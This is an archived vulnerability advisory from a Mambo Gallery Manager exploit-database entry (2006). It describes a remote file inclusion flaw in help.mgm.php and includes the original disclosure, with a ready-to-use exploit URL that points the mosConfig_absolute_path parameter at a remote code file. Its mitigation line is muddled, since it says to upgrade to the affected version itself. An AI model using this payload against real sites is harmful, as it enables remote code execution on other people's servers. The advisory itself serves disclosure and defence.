Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities

vendor:

Mambo Gallery Manager

by:

A-S-T TEAM

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Mambo Gallery Manager

Affected Version From: v095.r3

Affected Version To: v095.r3

Patch Exists: Yes

Related CWE: N/A

CPE: a:mambo_project:mambo_gallery_manager:0.95.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities

Mambo Gallery Manager v095.r3 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter in the 'help.mgm.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Mambo Gallery Manager v095.r3 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path .
"/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy,troq AND ALL LEZR.COM Member

# milw0rm.com [2006-07-28]